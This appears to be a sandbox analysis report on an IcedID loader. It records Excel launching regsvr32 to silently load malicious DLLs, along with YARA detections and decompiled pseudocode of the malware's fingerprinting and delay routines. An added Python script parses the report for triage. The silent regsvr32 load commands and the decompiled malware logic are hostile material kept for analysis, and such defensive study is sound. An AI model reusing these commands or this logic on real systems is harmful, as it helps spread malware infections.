Certificate chain presented by the server:

Subject | Issuer | Not Before | Not After
CN=aws.amazon.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Wed Sep 30 02:00:00 CEST 2020 | Thu Sep 23 14:00:00 CEST 2021
CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025
CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037
CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

Start time: 16:03:35
Start date: 06/07/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13fc70000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                                                                                        General

Start time: 16:03:37
Start date: 06/07/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32 -silent ..\XRAY.dll
Imagebase: 0xffe20000
File size: 19456 bytes
MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 16:03:38
Start date: 06/07/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32 -silent ..\XTOWN.dll
Imagebase: 0xffe20000
File size: 19456 bytes
MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2088452556.0000000000190000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
• Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp, Author: Joe Security
Reputation: high

General

Start time: 16:03:41
Start date: 06/07/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32 -silent ..\XZIBIT.dll
Imagebase: 0xffe20000
File size: 19456 bytes
MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis


Executed Functions

C-Code - Quality: 25%
E003C27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
	void* __rdi;
	int _t23;
	void* _t24;
	void* _t27;
	intOrPtr _t35;
	void* _t36;
	intOrPtr* _t44;
	long long _t46;
	intOrPtr* _t48;
	intOrPtr* _t54;
	intOrPtr* _t62;
	signed long long _t64;
	long long* _t67;
	intOrPtr* _t69;
	void* _t77;
	void* _t78;
	struct HINSTANCE__* _t79;
	void* _t80;
	CHAR* _t82;
	char* _t83;

	_t64 = __rsi;
	_t46 = __rbx;
	_t44 = _t69;
	 *((long long*)(_t44 + 8)) = __rbx;
	 *((long long*)(_t44 + 0x18)) = __rbp;
	 *((long long*)(_t44 + 0x20)) = __rsi;
	_push(_t62);
	_t80 = __rcx;
	_t83 = L"; _gid=";
	 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
	LoadLibraryA(_t82);
	GetProcAddress(_t79);
	_t67 = _t44;
	if(_t44 == 0) {
		L6:
		r9d = 1;
		_t23 = E003C2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x3c70c4, _t77, _t78);
		L7:
		return _t23;
	}
	_t24 =  *_t67(); // executed
	if(_t24 == 0x6f && __rbx != 0) {
		GetProcessHeap();
		_t9 = _t64 + 8; // 0x8
		_t36 = _t9;
		HeapAlloc(??, ??, ??);
		_t62 = _t44;
		if(_t44 == 0) {
			goto L6;
		}
		_t54 = _t44; // executed
		_t27 =  *_t67(); // executed
		if(_t27 == 0) {
			_t48 = _t62;
			do {
				if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
					_t35 =  *((intOrPtr*)(_t48 + 0x194));
					if(_t54 - 1 <= 7) {
						r9d = _t35;
						_t18 = _t48 + 0x198; // 0x198
						_t54 = _t80 + _t64 * 2;
						E003C2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
						_t64 = _t64 + _t44;
						_t83 = ":";
					}
				}
				_t48 =  *_t48;
			} while (_t48 != 0);
			GetProcessHeap();
			_t36 = 0;
			_t23 = HeapFree(??, ??, ??);
			if(_t64 == 0) {
				goto L6;
			}
			goto L7;
		}
		GetProcessHeap();
		_t36 = 0;
		HeapFree(??, ??, ??);
	}
}
Instruction addresses (disassembly listing, truncated): 0x003c27bc, 0x003c27bf, 0x003c27c3, 0x003c27c7, 0x003c27cb, 0x003c27d4, 0x003c27d7, 0x003c27e7, 0x003c27ea
                                                                                                                                                                                                                                          0x003c27fa
                                                                                                                                                                                                                                          0x003c2800
                                                                                                                                                                                                                                          0x003c2806
                                                                                                                                                                                                                                          0x003c285f
                                                                                                                                                                                                                                          0x003c285f
                                                                                                                                                                                                                                          0x003c2876
                                                                                                                                                                                                                                          0x003c287b
                                                                                                                                                                                                                                          0x003c2893
                                                                                                                                                                                                                                          0x003c2893
                                                                                                                                                                                                                                          0x003c280f
                                                                                                                                                                                                                                          0x003c2814
                                                                                                                                                                                                                                          0x003c281f
                                                                                                                                                                                                                                          0x003c282c
                                                                                                                                                                                                                                          0x003c282c
                                                                                                                                                                                                                                          0x003c282f
                                                                                                                                                                                                                                          0x003c2835
                                                                                                                                                                                                                                          0x003c283b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x003c2842
                                                                                                                                                                                                                                          0x003c2845
                                                                                                                                                                                                                                          0x003c2849
                                                                                                                                                                                                                                          0x003c2894
                                                                                                                                                                                                                                          0x003c2897
                                                                                                                                                                                                                                          0x003c289e
                                                                                                                                                                                                                                          0x003c28a9
                                                                                                                                                                                                                                          0x003c28b5
                                                                                                                                                                                                                                          0x003c28b7
                                                                                                                                                                                                                                          0x003c28ba
                                                                                                                                                                                                                                          0x003c28c1
                                                                                                                                                                                                                                          0x003c28c8
                                                                                                                                                                                                                                          0x003c28cd
                                                                                                                                                                                                                                          0x003c28d0
                                                                                                                                                                                                                                          0x003c28d0
                                                                                                                                                                                                                                          0x003c28b5
                                                                                                                                                                                                                                          0x003c28d7
                                                                                                                                                                                                                                          0x003c28da
                                                                                                                                                                                                                                          0x003c28df
                                                                                                                                                                                                                                          0x003c28e8
                                                                                                                                                                                                                                          0x003c28ed
                                                                                                                                                                                                                                          0x003c28f6
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x003c28fc
                                                                                                                                                                                                                                          0x003c284b
                                                                                                                                                                                                                                          0x003c2854
                                                                                                                                                                                                                                          0x003c2859
                                                                                                                                                                                                                                          0x003c2859

APIs
• GetAdaptersInfo.IPHLPAPI(?,?,00000000,003C2CFE,?,?,00000003,003C24A4), ref: 003C280F
• GetAdaptersInfo.IPHLPAPI(?,?,00000000,003C2CFE,?,?,00000003,003C24A4), ref: 003C2845
Memory Dump Source
• Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
Similarity
• API ID: AdaptersInfo
• String ID:
• API String ID: 3177971545-0
• Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
• Instruction ID: bb11fc6fe3eed2fe7155bbf7ec5d968070fc0d6733d0c1099ac9ef1750c9625d
• Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
• Instruction Fuzzy Hash: F2318D62605B9096FB16EB62E810B9AB764FB49F94F494029CF0D9B714EF38CA49C300
Uniqueness
• Uniqueness Score: -1.00%

APIs
• NtQuerySystemInformation.NTDLL(?,?,00000000,003C2CB1,?,?,00000003,003C24A4), ref: 003C16CB
• RtlAllocateHeap.NTDLL(?,?,00000000,003C2CB1,?,?,00000003,003C24A4), ref: 003C1709
Memory Dump Source
• Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
Similarity
• API ID: AllocateHeapInformationQuerySystem
• String ID:
• API String ID: 3114120137-0
• Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
• Instruction ID: c8c7a3c17b1efe81dbd332913f98805f4353568e0c521678c8a86ec9fcbc4b6d
• Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
• Instruction Fuzzy Hash: B421AE62355B4083FF07CB52A814B69A2A9BB8ABC0F194038DE0AD3715EF3CCE469700
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
• Instruction ID: bf883d324c5e961a7d794fc23aa9d084b8bde4775d35c8a1298948b27ba45f0d
• Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
• Instruction Fuzzy Hash: 3971E336301B918BEB26CF62E810F9937B5FB49B94F098129DE4A93B14DF38CA55D700
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LookupAccountNameW.ADVAPI32 ref: 003C233C
Memory Dump Source
• Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
Similarity
• API ID: AccountLookupName
• String ID:
• API String ID: 1484870144-0
• Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
• Instruction ID: 98e3a6e471cb0f80a604f29422bbe5e2095da11412a9f3507f89f2eb0ceb38b7
• Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
• Instruction Fuzzy Hash: F031B372701B418AEB168F75E844BDE73A4FB48788F554139DA4DA3B18EF38CA08C340
Uniqueness
• Uniqueness Score: -1.00%
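The four APIs blocks above list, per decompiled function, the call sites the sandbox attributed to it (GetAdaptersInfo twice, NtQuerySystemInformation plus RtlAllocateHeap, an empty AllocateHeap block, and LookupAccountNameW), but as plain text they are awkward to triage. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the IcedID sample: it parses those bullet lines from a constructed excerpt embedded inline, turns each call-site address into an offset inside the .sdmp dump using the Offset in the Source File line, flags APIs called from more than one site within a single function, and checks which call sites fall inside a supplied basic-block address range (the demo uses 0x003c27bc to 0x003c28fc, the range listed for the GetAdaptersInfo function). The regex, the FunctionBlock/ApiRef names and the treatment of `?` as an unresolved argument are this example's own choices.

```python
"""Triage helper for the per-function 'APIs' blocks of a Joe Sandbox report.

Added example for this page, not code from the report or from the IcedID
sample. REPORT_EXCERPT is constructed from the API reference lines shown
above; the block range used in the demo is the one listed for the
GetAdaptersInfo function.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed excerpt: bullet lines of the API blocks above plus the
# Source File line that carries the memory-dump base ("Offset:").
REPORT_EXCERPT = """\
APIs
• GetAdaptersInfo.IPHLPAPI(?,?,00000000,003C2CFE,?,?,00000003,003C24A4), ref: 003C280F
• GetAdaptersInfo.IPHLPAPI(?,?,00000000,003C2CFE,?,?,00000003,003C24A4), ref: 003C2845
Memory Dump Source
• Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
APIs
• NtQuerySystemInformation.NTDLL(?,?,00000000,003C2CB1,?,?,00000003,003C24A4), ref: 003C16CB
• RtlAllocateHeap.NTDLL(?,?,00000000,003C2CB1,?,?,00000003,003C24A4), ref: 003C1709
Memory Dump Source
• Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
APIs
Memory Dump Source
APIs
• LookupAccountNameW.ADVAPI32 ref: 003C233C
"""

# "<api>.<module>(<args>), ref: <addr>"; the argument list is optional and
# '?' marks a value the sandbox could not resolve.
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
DUMP_BASE = re.compile(r"Source File:.*?Offset:\s*(?P<base>[0-9A-Fa-f]+)")


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Optional[int]]  # None where the report shows '?'
    ref: int                   # virtual address of the call site


@dataclass
class FunctionBlock:
    calls: List[ApiRef] = field(default_factory=list)
    dump_base: Optional[int] = None


def parse_args(text: Optional[str]) -> List[Optional[int]]:
    if not text:
        return []
    return [None if t.strip() == "?" else int(t, 16) for t in text.split(",")]


def parse_api_line(line: str) -> Optional[ApiRef]:
    m = API_LINE.match(line)
    if m is None:
        return None
    return ApiRef(m["api"], m["module"], parse_args(m["args"]), int(m["ref"], 16))


def parse_report(text: str) -> List[FunctionBlock]:
    """One FunctionBlock per 'APIs' header, in report order."""
    blocks: List[FunctionBlock] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append(FunctionBlock())
        elif blocks:
            call = parse_api_line(line)
            if call is not None:
                blocks[-1].calls.append(call)
            elif (m := DUMP_BASE.search(line)) is not None:
                blocks[-1].dump_base = int(m["base"], 16)
    return blocks


def dump_offset(block: FunctionBlock, call: ApiRef) -> Optional[int]:
    """Offset of the call site inside the .sdmp file (ref minus dump base)."""
    if block.dump_base is None or call.ref < block.dump_base:
        return None
    return call.ref - block.dump_base


def calls_in_range(block: FunctionBlock, lo: int, hi: int) -> List[ApiRef]:
    """Call sites whose address lies in [lo, hi], e.g. a function's blocks."""
    return [c for c in block.calls if lo <= c.ref <= hi]


def repeated_apis(block: FunctionBlock) -> Dict[str, int]:
    """APIs called from more than one site in the same function."""
    counts = Counter(c.api for c in block.calls)
    return {api: n for api, n in sorted(counts.items()) if n > 1}


if __name__ == "__main__":
    blocks = parse_report(REPORT_EXCERPT)
    for i, b in enumerate(blocks):
        for c in b.calls:
            off = dump_offset(b, c)
            off_s = f"{off:#x}" if off is not None else "n/a"
            print(f"fn{i}: {c.module}!{c.api} at {c.ref:08X} (dump offset {off_s})")
        if repeated_apis(b):
            print(f"fn{i}: called more than once: {repeated_apis(b)}")
    inside = calls_in_range(blocks[0], 0x003C27BC, 0x003C28FC)
    print("GetAdaptersInfo sites inside 0x3C27BC..0x3C28FC:",
          [f"{c.ref:08X}" for c in inside])
```

Two practical notes. First, the dump offsets (0x280F and 0x2845 for the two GetAdaptersInfo sites) are what you seek in the .sdmp file when you want to see the actual call instructions, since the report's address column above lost its instruction text. Second, GetAdaptersInfo's documented contract is that a call with a too-small buffer fails with ERROR_BUFFER_OVERFLOW and writes the required size, so two call sites in one function, followed by the GetProcessHeap/HeapFree tail shown above, is the shape of the usual size-query, allocate, fill, free sequence; the report's argument columns show `?` for the buffer and size parameters, so that reading is an inference from the API contract, not something the report itself confirms.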

C-Code - Quality: 58%
E003C2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
	void* __rbp;
	void* _t27;
	void* _t40;
	void* _t41;
	signed long long _t51;
	signed long long _t52;
	signed long long _t64;
	long long _t69;
	void* _t73;
	void* _t75;
	void* _t82;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t82 = __r9;
                                                                                                                                                                                                                                          				_t71 = __rsi;
                                                                                                                                                                                                                                          				_t69 = __rdi;
                                                                                                                                                                                                                                          				_t64 = __rdx;
                                                                                                                                                                                                                                          				_t52 = __rbx;
                                                                                                                                                                                                                                          				_t51 = __rax;
                                                                                                                                                                                                                                          				 *((long long*)(_t75 + 0x18)) = __rbx;
                                                                                                                                                                                                                                          				 *((long long*)(_t75 + 0x20)) = __rdi;
                                                                                                                                                                                                                                          				_t73 = _t75 - 0x57;
                                                                                                                                                                                                                                          				_t4 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                          				_t40 = _t4;
                                                                                                                                                                                                                                          				goto L1;
                                                                                                                                                                                                                                          				L9:
                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                          				L1:
                                                                                                                                                                                                                                          				asm("rdtsc");
                                                                                                                                                                                                                                          				_t64 = _t64 << 0x20;
                                                                                                                                                                                                                                          				_t51 = _t51 | _t64;
                                                                                                                                                                                                                                          				_t52 = _t52 << 0x00000010 | __rcx;
                                                                                                                                                                                                                                          				SleepEx(??, ??); // executed
                                                                                                                                                                                                                                          				_t69 = _t69 - 1;
                                                                                                                                                                                                                                          				if(_t69 != 0) {
                                                                                                                                                                                                                                          					goto L1;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					wsprintfA();
                                                                                                                                                                                                                                          					E003C11FC(_t73 - 0x29, _t52);
                                                                                                                                                                                                                                          					_t37 = E003C153C(_t73 - 0x29);
                                                                                                                                                                                                                                          					E003C2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
                                                                                                                                                                                                                                          					_t44 = _t51;
                                                                                                                                                                                                                                          					if(_t51 != 0) {
                                                                                                                                                                                                                                          						_t80 = _t73 + 0x67;
                                                                                                                                                                                                                                          						if(E003C1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
                                                                                                                                                                                                                                          							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
                                                                                                                                                                                                                                          							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
                                                                                                                                                                                                                                          								_t27 = E003C272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
                                                                                                                                                                                                                                          								_t55 =  *((intOrPtr*)(_t73 + 0x67));
                                                                                                                                                                                                                                          								_t41 = _t27;
                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
                                                                                                                                                                                                                                          									GetProcessHeap();
                                                                                                                                                                                                                                          									HeapFree(??, ??, ??);
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								E003C1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
                                                                                                                                                                                                                                          								_t49 = _t51;
                                                                                                                                                                                                                                          								if(_t51 != 0) {
                                                                                                                                                                                                                                          									E003C2A1C(_t49, _t73 + 0x1b, _t51);
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}















APIs
Memory Dump Source
• Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
• Instruction ID: 3a5526147925d3f94f300cab5f3655c6d3261babce169db677538d4453cf7dd0
• Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
• Instruction Fuzzy Hash: F621B332300A409AEF12DFB1D850BDE7365F744784F49442ADE4DD7609EE38DA05C350
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: AllocVirtual
• String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
• API String ID: 4275171209-1517691801
• Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
• Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
• Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
• Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
• String ID: DllRegisterServer$G$_
• API String ID: 1174013218-1650116920
• Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
• Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
• Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
• Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: AllocVirtual
• String ID: @
• API String ID: 4275171209-2766056989
• Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
• Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
• Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
• Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
Similarity
• API ID: ExitProcessSleepUser
• String ID:
• API String ID: 354099737-0
• Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
• Instruction ID: 9c7c9d9c2d0bd7cd3f8823995ffb501ce7bf21df4d1a396c14df8e8a8c826ec2
• Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
• Instruction Fuzzy Hash: A6C08C311006B0C2F31F5720E968F29623CA341309F01061DC303D5AE08F3C1AC8D303
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
• Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
• Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
• Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,003C1E13), ref: 003C264B
Memory Dump Source
• Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
Similarity
• API ID: InfoNativeSystem
• String ID:
• API String ID: 1721193555-0
• Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
• Instruction ID: 3a2d15c42007ff3074eb114a3080d111b7fbc97399c866a5e034371daad1b4c7
• Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
• Instruction Fuzzy Hash: 02E09262724551C2EF12EB20E8547D93324FB84704F840126894E92660EF2CCB5DCB00
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
• Instruction ID: 5b490d2d9c1044e8f91cdc1b49e4fbc6d1478f64234bfb903e92802c00fa508e
• Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
• Instruction Fuzzy Hash: D2D0A773E1025083F7318710EA16B9A6315F3D5315F804206C54984554CF3CC258C700
Uniqueness
Uniqueness Score: -1.00%

Non-executed Functions

Strings
Memory Dump Source
• Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: %
• API String ID: 0-2567322570
• Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
• Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
• Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
• Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
